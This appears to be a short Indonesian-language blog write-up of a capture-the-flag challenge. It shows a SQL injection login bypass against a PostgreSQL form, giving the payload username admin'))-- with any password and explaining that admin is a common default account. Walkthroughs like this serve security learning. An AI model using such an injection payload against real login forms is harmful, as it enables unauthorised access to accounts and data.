pada soal kita harus membypass sebuah login dengan jenis database PostgreSQL, sekarang saya coba dengan memasukan query ' pada form username, lalu muncul pesan error.
WHERE (username = (''') AND password = ('f7c3bc1d80
dari query diatas bisa saya akali dengan cara WHERE (username = ('admin'))-- ') AND password = ('f7c3bc1d80
Query yang digunakan:
Username: admin'))--
Password: boleh diisi/kosong
setelah itu coba anda submit maka akan muncul flag, dan kenapa pakai username admin? karena rata2 default admin.
No comments:
Post a Comment